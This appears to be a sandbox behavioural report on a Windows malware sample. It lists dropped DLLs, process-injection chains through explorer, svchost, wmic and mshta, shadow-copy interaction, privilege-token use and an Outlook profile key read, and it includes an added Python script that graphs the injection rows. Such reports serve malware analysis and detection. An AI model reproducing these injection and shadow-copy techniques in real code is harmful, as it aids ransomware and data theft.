Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\Fontcore\ActionCenterCPL.dll C:\Windows\SysWOW64\explorer.exe N/A
File created C:\Windows\SysWOW64\Fontcore\api-ms-win-crt-multibyte-l1-1-0.dll C:\Windows\SysWOW64\explorer.exe N/A
File created C:\Windows\SysWOW64\Fontcore\bcryptprimitives.dll C:\Windows\SysWOW64\explorer.exe N/A
File created C:\Windows\SysWOW64\Fontcore\catsrv.dll C:\Windows\SysWOW64\explorer.exe N/A
File created C:\Windows\SysWOW64\Fontcore\AuxiliaryDisplayApi.dll C:\Windows\SysWOW64\explorer.exe N/A
File created C:\Windows\SysWOW64\Fontcore\Fontcore.cmd C:\Windows\SysWOW64\explorer.exe N/A
File created C:\Windows\SysWOW64\Fontcore\ActionCenterCPL.dll C:\Windows\SysWOW64\explorer.exe N/A
File created C:\Windows\SysWOW64\Fontcore\activeds.dll C:\Windows\SysWOW64\explorer.exe N/A
File created C:\Windows\SysWOW64\Fontcore\api-ms-win-crt-conio-l1-1-0.dll C:\Windows\SysWOW64\explorer.exe N/A
File created C:\Windows\SysWOW64\Fontcore\appmgr.dll C:\Windows\SysWOW64\explorer.exe N/A
File created C:\Windows\SysWOW64\Fontcore\appidapi.dll C:\Windows\SysWOW64\explorer.exe N/A
File created C:\Windows\SysWOW64\Fontcore\bitsprx6.dll C:\Windows\SysWOW64\explorer.exe N/A
File created C:\Windows\SysWOW64\Fontcore\advpack.dll C:\Windows\SysWOW64\explorer.exe N/A
File created C:\Windows\SysWOW64\Fontcore\api-ms-win-core-file-l1-1-0.dll C:\Windows\SysWOW64\explorer.exe N/A
File created C:\Windows\SysWOW64\Fontcore\api-ms-win-crt-private-l1-1-0.dll C:\Windows\SysWOW64\explorer.exe N/A
File created C:\Windows\SysWOW64\Fontcore\apilogen.dll C:\Windows\SysWOW64\explorer.exe N/A
File created C:\Windows\SysWOW64\Fontcore\api-ms-win-downlevel-version-l1-1-0.dll C:\Windows\SysWOW64\explorer.exe N/A
File created C:\Windows\SysWOW64\Fontcore\api-ms-win-service-management-l2-1-0.dll C:\Windows\SysWOW64\explorer.exe N/A
File created C:\Windows\SysWOW64\Fontcore\adsldpc.dll C:\Windows\SysWOW64\explorer.exe N/A
File created C:\Windows\SysWOW64\Fontcore\api-ms-win-core-heap-l1-1-0.dll C:\Windows\SysWOW64\explorer.exe N/A
File created C:\Windows\SysWOW64\Fontcore\api-ms-win-crt-heap-l1-1-0.dll C:\Windows\SysWOW64\explorer.exe N/A
File created C:\Windows\SysWOW64\Fontcore\api-ms-win-downlevel-ole32-l1-1-0.dll C:\Windows\SysWOW64\explorer.exe N/A
File opened for modification C:\Windows\SysWOW64\Fontcore C:\Windows\SysWOW64\explorer.exe N/A
File created C:\Windows\SysWOW64\Fontcore\api-ms-win-core-processthreads-l1-1-0.dll C:\Windows\SysWOW64\explorer.exe N/A
File created C:\Windows\SysWOW64\Fontcore\btpanui.dll C:\Windows\SysWOW64\explorer.exe N/A
File created C:\Windows\SysWOW64\Fontcore\BWUnpairElevated.dll C:\Windows\SysWOW64\explorer.exe N/A
File created C:\Windows\SysWOW64\Fontcore\cabview.dll C:\Windows\SysWOW64\explorer.exe N/A
File created C:\Windows\SysWOW64\Fontcore\Fontcore.lnk C:\Windows\SysWOW64\explorer.exe N/A
File created C:\Windows\SysWOW64\Fontcore\api-ms-win-core-errorhandling-l1-1-0.dll C:\Windows\SysWOW64\explorer.exe N/A
File created C:\Windows\SysWOW64\Fontcore\api-ms-win-core-interlocked-l1-1-0.dll C:\Windows\SysWOW64\explorer.exe N/A
File created C:\Windows\SysWOW64\Fontcore\api-ms-win-core-localization-l1-2-0.dll C:\Windows\SysWOW64\explorer.exe N/A
File created C:\Windows\SysWOW64\Fontcore\avifil32.dll C:\Windows\SysWOW64\explorer.exe N/A
File opened for modification C:\Windows\SysWOW64\Fontcore\Fontcore.lnk C:\Windows\SysWOW64\explorer.exe N/A
File created C:\Windows\SysWOW64\Fontcore\api-ms-win-core-rtlsupport-l1-1-0.dll C:\Windows\SysWOW64\explorer.exe N/A
File created C:\Windows\SysWOW64\Fontcore\api-ms-win-core-synch-l1-2-0.dll C:\Windows\SysWOW64\explorer.exe N/A
File created C:\Windows\SysWOW64\Fontcore\authui.dll C:\Windows\SysWOW64\explorer.exe N/A
File created C:\Windows\SysWOW64\Fontcore\bitsprx4.dll C:\Windows\SysWOW64\explorer.exe N/A
File created C:\Windows\SysWOW64\Fontcore\catsrvut.dll C:\Windows\SysWOW64\explorer.exe N/A
File opened for modification C:\Windows\SysWOW64\Fontcore\Fontcore.cmd C:\Windows\SysWOW64\explorer.exe N/A
File created C:\Windows\SysWOW64\Fontcore\api-ms-win-core-datetime-l1-1-0.dll C:\Windows\SysWOW64\explorer.exe N/A
File created C:\Windows\SysWOW64\Fontcore\api-ms-win-core-namedpipe-l1-1-0.dll C:\Windows\SysWOW64\explorer.exe N/A
File created C:\Windows\SysWOW64\Fontcore\api-ms-win-downlevel-normaliz-l1-1-0.dll C:\Windows\SysWOW64\explorer.exe N/A
File created C:\Windows\SysWOW64\Fontcore\audiodev.dll C:\Windows\SysWOW64\explorer.exe N/A

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\svchost.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\tasklist.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\dffde400ad3d2af2bbd61c58bed9dcf7e3e37cec6210c9841d8ed5dc9117343d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\dffde400ad3d2af2bbd61c58bed9dcf7e3e37cec6210c9841d8ed5dc9117343d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\explorer.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\SysWOW64\svchost.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\svchost.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\SysWOW64\svchost.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\SysWOW64\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\SysWOW64\svchost.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\svchost.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\SysWOW64\svchost.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\SysWOW64\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\svchost.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\SysWOW64\svchost.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\svchost.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\SysWOW64\svchost.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\SysWOW64\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\svchost.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2536 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\dffde400ad3d2af2bbd61c58bed9dcf7e3e37cec6210c9841d8ed5dc9117343d.exe C:\Users\Admin\AppData\Local\Temp\dffde400ad3d2af2bbd61c58bed9dcf7e3e37cec6210c9841d8ed5dc9117343d.exe
PID 2536 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\dffde400ad3d2af2bbd61c58bed9dcf7e3e37cec6210c9841d8ed5dc9117343d.exe C:\Users\Admin\AppData\Local\Temp\dffde400ad3d2af2bbd61c58bed9dcf7e3e37cec6210c9841d8ed5dc9117343d.exe
PID 2536 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\dffde400ad3d2af2bbd61c58bed9dcf7e3e37cec6210c9841d8ed5dc9117343d.exe C:\Users\Admin\AppData\Local\Temp\dffde400ad3d2af2bbd61c58bed9dcf7e3e37cec6210c9841d8ed5dc9117343d.exe
PID 2536 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\dffde400ad3d2af2bbd61c58bed9dcf7e3e37cec6210c9841d8ed5dc9117343d.exe C:\Users\Admin\AppData\Local\Temp\dffde400ad3d2af2bbd61c58bed9dcf7e3e37cec6210c9841d8ed5dc9117343d.exe
PID 2536 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\dffde400ad3d2af2bbd61c58bed9dcf7e3e37cec6210c9841d8ed5dc9117343d.exe C:\Users\Admin\AppData\Local\Temp\dffde400ad3d2af2bbd61c58bed9dcf7e3e37cec6210c9841d8ed5dc9117343d.exe
PID 2536 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\dffde400ad3d2af2bbd61c58bed9dcf7e3e37cec6210c9841d8ed5dc9117343d.exe C:\Users\Admin\AppData\Local\Temp\dffde400ad3d2af2bbd61c58bed9dcf7e3e37cec6210c9841d8ed5dc9117343d.exe
PID 2536 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\dffde400ad3d2af2bbd61c58bed9dcf7e3e37cec6210c9841d8ed5dc9117343d.exe C:\Users\Admin\AppData\Local\Temp\dffde400ad3d2af2bbd61c58bed9dcf7e3e37cec6210c9841d8ed5dc9117343d.exe
PID 2536 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\dffde400ad3d2af2bbd61c58bed9dcf7e3e37cec6210c9841d8ed5dc9117343d.exe C:\Users\Admin\AppData\Local\Temp\dffde400ad3d2af2bbd61c58bed9dcf7e3e37cec6210c9841d8ed5dc9117343d.exe
PID 2536 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\dffde400ad3d2af2bbd61c58bed9dcf7e3e37cec6210c9841d8ed5dc9117343d.exe C:\Users\Admin\AppData\Local\Temp\dffde400ad3d2af2bbd61c58bed9dcf7e3e37cec6210c9841d8ed5dc9117343d.exe
PID 2536 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\dffde400ad3d2af2bbd61c58bed9dcf7e3e37cec6210c9841d8ed5dc9117343d.exe C:\Users\Admin\AppData\Local\Temp\dffde400ad3d2af2bbd61c58bed9dcf7e3e37cec6210c9841d8ed5dc9117343d.exe
PID 2536 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\dffde400ad3d2af2bbd61c58bed9dcf7e3e37cec6210c9841d8ed5dc9117343d.exe C:\Users\Admin\AppData\Local\Temp\dffde400ad3d2af2bbd61c58bed9dcf7e3e37cec6210c9841d8ed5dc9117343d.exe
PID 2536 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\dffde400ad3d2af2bbd61c58bed9dcf7e3e37cec6210c9841d8ed5dc9117343d.exe C:\Users\Admin\AppData\Local\Temp\dffde400ad3d2af2bbd61c58bed9dcf7e3e37cec6210c9841d8ed5dc9117343d.exe
PID 2536 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\dffde400ad3d2af2bbd61c58bed9dcf7e3e37cec6210c9841d8ed5dc9117343d.exe C:\Users\Admin\AppData\Local\Temp\dffde400ad3d2af2bbd61c58bed9dcf7e3e37cec6210c9841d8ed5dc9117343d.exe
PID 2772 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\dffde400ad3d2af2bbd61c58bed9dcf7e3e37cec6210c9841d8ed5dc9117343d.exe C:\Windows\SysWOW64\explorer.exe
PID 2772 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\dffde400ad3d2af2bbd61c58bed9dcf7e3e37cec6210c9841d8ed5dc9117343d.exe C:\Windows\SysWOW64\explorer.exe
PID 2772 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\dffde400ad3d2af2bbd61c58bed9dcf7e3e37cec6210c9841d8ed5dc9117343d.exe C:\Windows\SysWOW64\explorer.exe
PID 2772 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\dffde400ad3d2af2bbd61c58bed9dcf7e3e37cec6210c9841d8ed5dc9117343d.exe C:\Windows\SysWOW64\explorer.exe
PID 2796 wrote to memory of 2760 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\tasklist.exe
PID 2796 wrote to memory of 2760 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\tasklist.exe
PID 2796 wrote to memory of 2760 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\tasklist.exe
PID 2796 wrote to memory of 2760 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\tasklist.exe
PID 2760 wrote to memory of 2576 N/A C:\Windows\SysWOW64\tasklist.exe C:\Windows\SysWOW64\explorer.exe
PID 2760 wrote to memory of 2576 N/A C:\Windows\SysWOW64\tasklist.exe C:\Windows\SysWOW64\explorer.exe
PID 2760 wrote to memory of 2576 N/A C:\Windows\SysWOW64\tasklist.exe C:\Windows\SysWOW64\explorer.exe
PID 2760 wrote to memory of 2576 N/A C:\Windows\SysWOW64\tasklist.exe C:\Windows\SysWOW64\explorer.exe
PID 2760 wrote to memory of 1840 N/A C:\Windows\SysWOW64\tasklist.exe C:\Windows\SysWOW64\explorer.exe
PID 2760 wrote to memory of 1840 N/A C:\Windows\SysWOW64\tasklist.exe C:\Windows\SysWOW64\explorer.exe
PID 2760 wrote to memory of 1840 N/A C:\Windows\SysWOW64\tasklist.exe C:\Windows\SysWOW64\explorer.exe
PID 2760 wrote to memory of 1840 N/A C:\Windows\SysWOW64\tasklist.exe C:\Windows\SysWOW64\explorer.exe
PID 2576 wrote to memory of 576 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\svchost.exe
PID 2576 wrote to memory of 576 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\svchost.exe
PID 2576 wrote to memory of 576 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\svchost.exe
PID 2576 wrote to memory of 576 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\svchost.exe
PID 1840 wrote to memory of 952 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\svchost.exe
PID 1840 wrote to memory of 952 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\svchost.exe
PID 1840 wrote to memory of 952 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\svchost.exe
PID 1840 wrote to memory of 952 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\svchost.exe
PID 2760 wrote to memory of 1672 N/A C:\Windows\SysWOW64\tasklist.exe C:\Windows\SysWOW64\explorer.exe
PID 2760 wrote to memory of 1672 N/A C:\Windows\SysWOW64\tasklist.exe C:\Windows\SysWOW64\explorer.exe
PID 2760 wrote to memory of 1672 N/A C:\Windows\SysWOW64\tasklist.exe C:\Windows\SysWOW64\explorer.exe
PID 2760 wrote to memory of 1672 N/A C:\Windows\SysWOW64\tasklist.exe C:\Windows\SysWOW64\explorer.exe
PID 576 wrote to memory of 2396 N/A C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\Wbem\wmic.exe
PID 576 wrote to memory of 2396 N/A C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\Wbem\wmic.exe
PID 576 wrote to memory of 2396 N/A C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\Wbem\wmic.exe
PID 576 wrote to memory of 2396 N/A C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\Wbem\wmic.exe
PID 576 wrote to memory of 2516 N/A C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\mshta.exe
PID 576 wrote to memory of 2516 N/A C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\mshta.exe
PID 576 wrote to memory of 2516 N/A C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\mshta.exe
PID 576 wrote to memory of 2516 N/A C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\mshta.exe
PID 2760 wrote to memory of 2876 N/A C:\Windows\SysWOW64\tasklist.exe C:\Windows\SysWOW64\explorer.exe
PID 2760 wrote to memory of 2876 N/A C:\Windows\SysWOW64\tasklist.exe C:\Windows\SysWOW64\explorer.exe
PID 2760 wrote to memory of 2876 N/A C:\Windows\SysWOW64\tasklist.exe C:\Windows\SysWOW64\explorer.exe
PID 2760 wrote to memory of 2876 N/A C:\Windows\SysWOW64\tasklist.exe C:\Windows\SysWOW64\explorer.exe
PID 2876 wrote to memory of 1748 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\svchost.exe
PID 2876 wrote to memory of 1748 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\svchost.exe
PID 2876 wrote to memory of 1748 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\svchost.exe
PID 2876 wrote to memory of 1748 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\svchost.exe
PID 2760 wrote to memory of 2792 N/A C:\Windows\SysWOW64\tasklist.exe C:\Windows\SysWOW64\explorer.exe
PID 2760 wrote to memory of 2792 N/A C:\Windows\SysWOW64\tasklist.exe C:\Windows\SysWOW64\explorer.exe
PID 2760 wrote to memory of 2792 N/A C:\Windows\SysWOW64\tasklist.exe C:\Windows\SysWOW64\explorer.exe
PID 2760 wrote to memory of 2792 N/A C:\Windows\SysWOW64\tasklist.exe C:\Windows\SysWOW64\explorer.exe
PID 1748 wrote to memory of 2884 N/A C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\mshta.exe
PID 1748 wrote to memory of 2884 N/A C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\mshta.exe
PID 1748 wrote to memory of 2884 N/A C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\mshta.exe
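The WriteProcessMemory table above is easier to read as a graph: each row is one write from a source PID into a target PID, the sandbox logs one row per call (hence the repeats), and the sample's path into explorer.exe, tasklist.exe, svchost.exe, wmic.exe and mshta.exe is a chain of such writes rather than a normal parent/child tree. The following script is an added example, not part of the report or of any sandbox tooling; it parses a constructed subset of the rows above (including two of the repeated ones), de-duplicates them and prints the injection chains root to leaf.

```python
import re
from collections import defaultdict

# Constructed input: a subset of the "Suspicious use of WriteProcessMemory" rows
# from the behavioral25 detonation above, with two of the repeated rows kept on
# purpose (the sandbox logs one row per WriteProcessMemory call).
S = r"C:\Users\Admin\AppData\Local\Temp\dffde400ad3d2af2bbd61c58bed9dcf7e3e37cec6210c9841d8ed5dc9117343d.exe"
W = r"C:\Windows\SysWOW64"
SAMPLE_ROWS = "\n".join([
    f"PID 2536 wrote to memory of 2772 N/A {S} {S}",
    f"PID 2536 wrote to memory of 2772 N/A {S} {S}",
    f"PID 2772 wrote to memory of 2796 N/A {S} {W}\\explorer.exe",
    f"PID 2796 wrote to memory of 2760 N/A {W}\\explorer.exe {W}\\tasklist.exe",
    f"PID 2760 wrote to memory of 2576 N/A {W}\\tasklist.exe {W}\\explorer.exe",
    f"PID 2760 wrote to memory of 1840 N/A {W}\\tasklist.exe {W}\\explorer.exe",
    f"PID 2576 wrote to memory of 576 N/A {W}\\explorer.exe {W}\\svchost.exe",
    f"PID 1840 wrote to memory of 952 N/A {W}\\explorer.exe {W}\\svchost.exe",
    f"PID 2760 wrote to memory of 1672 N/A {W}\\tasklist.exe {W}\\explorer.exe",
    f"PID 576 wrote to memory of 2396 N/A {W}\\svchost.exe {W}\\Wbem\\wmic.exe",
    f"PID 576 wrote to memory of 2516 N/A {W}\\svchost.exe {W}\\mshta.exe",
    f"PID 2760 wrote to memory of 2876 N/A {W}\\tasklist.exe {W}\\explorer.exe",
    f"PID 2876 wrote to memory of 1748 N/A {W}\\explorer.exe {W}\\svchost.exe",
    f"PID 2760 wrote to memory of 2792 N/A {W}\\tasklist.exe {W}\\explorer.exe",
    f"PID 1748 wrote to memory of 2884 N/A {W}\\svchost.exe {W}\\mshta.exe",
])

ROW_RE = re.compile(r"^PID (\d+) wrote to memory of (\d+) N/A (\S+) (\S+)$")


def parse_edges(text):
    """Parse rows into unique (src_pid, dst_pid, src_image, dst_image) edges, first-seen order."""
    edges, seen = [], set()
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue
        src, dst, src_img, dst_img = m.groups()
        if (src, dst) in seen:
            continue  # repeated row: another write into the same target process
        seen.add((src, dst))
        edges.append((int(src), int(dst), src_img, dst_img))
    return edges


def build_graph(edges):
    """Adjacency list keyed by writer pid, image per pid, and the pids nobody wrote into."""
    children, images = defaultdict(list), {}
    for src, dst, src_img, dst_img in edges:
        children[src].append(dst)
        images.setdefault(src, src_img)
        images[dst] = dst_img
    written_into = {dst for _, dst, _, _ in edges}
    roots = sorted(pid for pid in images if pid not in written_into)
    return children, images, roots


def basename(path):
    return path.rsplit("\\", 1)[-1]


def chains(edges):
    """Every root-to-leaf path of image basenames: the injection chain behind each final process."""
    children, images, roots = build_graph(edges)
    out = []

    def walk(pid, path):
        path = path + [basename(images[pid])]
        if not children.get(pid):
            out.append(path)
        for child in children.get(pid, []):
            walk(child, path)

    for root in roots:
        walk(root, [])
    return out


def render(edges):
    """Indented tree, one line per pid, for a quick look at the detonation."""
    children, images, roots = build_graph(edges)
    lines = []

    def walk(pid, depth):
        lines.append("  " * depth + f"{pid}  {basename(images[pid])}")
        for child in children.get(pid, []):
            walk(child, depth + 1)

    for root in roots:
        walk(root, 0)
    return "\n".join(lines)


if __name__ == "__main__":
    edges = parse_edges(SAMPLE_ROWS)
    print(render(edges))
    for chain in chains(edges):
        print(" -> ".join(chain))
```

The rendered tree shows why a parent-PID rule alone misses this sample: by the time wmic.exe and mshta.exe run, their writer is a SysWOW64 svchost.exe that was itself written into by explorer.exe, which was written into by tasklist.exe, and none of those are the dropped executable.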

Uses Volume Shadow Copy service COM API

ransomware

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Windows\SysWOW64\svchost.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\dffde400ad3d2af2bbd61c58bed9dcf7e3e37cec6210c9841d8ed5dc9117343d.exe

"C:\Users\Admin\AppData\Local\Temp\dffde400ad3d2af2bbd61c58bed9dcf7e3e37cec6210c9841d8ed5dc9117343d.exe"

C:\Users\Admin\AppData\Local\Temp\dffde400ad3d2af2bbd61c58bed9dcf7e3e37cec6210c9841d8ed5dc9117343d.exe

C:\Users\Admin\AppData\Local\Temp\dffde400ad3d2af2bbd61c58bed9dcf7e3e37cec6210c9841d8ed5dc9117343d.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\tasklist.exe

C:\Windows\SysWOW64\tasklist.exe

